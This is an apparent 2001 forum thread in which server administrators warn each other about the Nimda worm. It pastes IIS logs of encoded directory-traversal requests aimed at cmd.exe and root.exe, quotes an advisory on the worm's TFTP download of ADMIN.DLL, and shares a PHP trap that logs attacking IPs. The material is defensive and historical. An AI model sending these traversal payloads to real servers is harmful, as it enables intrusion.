HEADS up for you ppl running webservers...

[Nanotech9]

i copied this from my screen logs on my webserver... i cant make heads or tales of it, except that someone or something itr trying to desperately **** up my webserver. I think it may be a mutated version or Code Redworm...

Watch your servers ppl.


wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..%2f..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..S5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..S5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..Áœ..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..À¯..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..Á..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\msadc\..%5c..\..%5c..\..%5c\..Á..\..Á..\..Á..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\_mem_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\_vti_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\c\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:48 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\MSADC\root.exe" - The system cannot find the path specified.
frp1h51.coserv.net 209.223.6.27 - [18/Sep/2001:21:38:45 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\root.exe" - The system cannot find the path specified.
TCP/IP Stack: WinSock 2.0 (1.1; 2.2) running on Windows NT/2000

[woozle]

I run several servers as webhosting is my primary business.

All domains which are being hosted on my servers are receiving these same requests.

Will look into it further.

[ironchef]

yeah, my server at home's getting hosed right now. i have no access to it from here though, only to connect and see how bloody slow she's moving. fockers. but ftp'ing in is slow as hell, and my radio station was buffering every few seconds.

cold fusion mailing list also confirms it.. several have reported attempts at their servers.

something too about .eml files being littered around the server which their virus scanner isn't detecting. let you know if i find more about it.

also had an unpleasant e-mail this morning. the bastards somehow encoded the attachment so it'll launch on clicking the e-mail and prompt to save or execute the .exe file. duh in that i'm not i'm gonna run it, but that's a pretty sneaky tactic.

[JPR]

yeah, my server at home's getting hosed right now

I see everything is going as planned.

and my radio station was buffering every few seconds

The music isnt that good anyways.

[Speedfreak]

Sorry about that.

[ironchef]

sorry for strange wraps.. from an e-mail:

and john, you smell

-----BEGIN PGP SIGNED MESSAGE-----

There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the
network.

A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following;

edit %systemroot/system32/drivers/etc/services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----

[Nanotech9]

guys, i went to www.diamondmm.com today to d/l some drivers... i noticed that EVERY FRIGGEN page i clicked on SPAWNED a download for README.EXE

i never downloaded it, but i bet its related to this...

fortunately, i dont use IIS im getting just freakin FLODDED though.

[ironchef]

yeah that is one of the neat little tricks this will do.

it's taking advantage of old exploits though. these server should be patched by now, for chrissakes.

[ironchef]

someone sent this out on a list. gives a neat little way of dealing with the hits that an apache box is getting:

-----

PHP Code:

i got tired of seeing boxes hitting my servers with this code red 
business so i did something about it....

first, i did this in the apache configuration outside of any virtual 
hosts so it would affect every site i run:

Alias /default.ida /usr/local/apache/vdocs/sys/codered/default.ida

then i did this: AddType application/x-httpd-php .ida (again, outside 
virtual hosts)

and then i made the default.ida file:

<?
   echo $REMOTE_ADDR;
   $msg = "CODE RED FROM $REMOTE_ADDR";
   #mail("andy@m...","CODERED",$msg);
   $fd = fopen("/usr/local/apache/vdocs/sys/codered/log","a");
   fwrite($fd,"$REMOTE_ADDR\n");
   fclose($fd);
   echo "YOU SUCK! DOWNLOAD THE PATCH!!";
?>

so that i would have a log of every ip that has been hitting my box! 
then i can make firewall rules to block them out completely or i can 
contact their admins or isp's and have them shutdown.

here are the worst offenders since 09-11-2001:
# of times  address
      12    198.63.212.15
      17    198.234.111.91
      57    198.172.140.13
    2050    198.172.66.246
    2553    198.172.176.135

the last two are on a closely related network to the one i'm on which 
is why i get hit so much.

anyhoo, if you want to keep track of who is pounding on your server 
and might not even realize they are infected, this will do the trick. 
i also wrote a short perl script to rotate the log:

#!/usr/bin/perl
$LOGFILE = "/usr/local/apache/vdocs/sys/codered/log";
$date = `date +'%m%d%Y%H%M'`;
chop $date;
print $date . "\n";
$NEWLOG = $LOGFILE . ".$date";
rename $LOGFILE, $NEWLOG || die "RENAME FAILED HORRIBLY $!\n";
open(FD,">$LOGFILE") || die "OPEN FAILED MISERABLY\n";
close(FD);
chown 99,99,$LOGFILE;
print "LOG ROTATED\n";

i hope this isn't too off topic, i thought some people might find it 
useful.  if you come up with any modifications, lemme know.
Andrew Watson

[Kenas]

Ashcroft just mentioned about this virus that was found today. He said it is not yet confermed that it has anything to do with the terrorists. He also said that the patch for the warm was released. It is called nimda.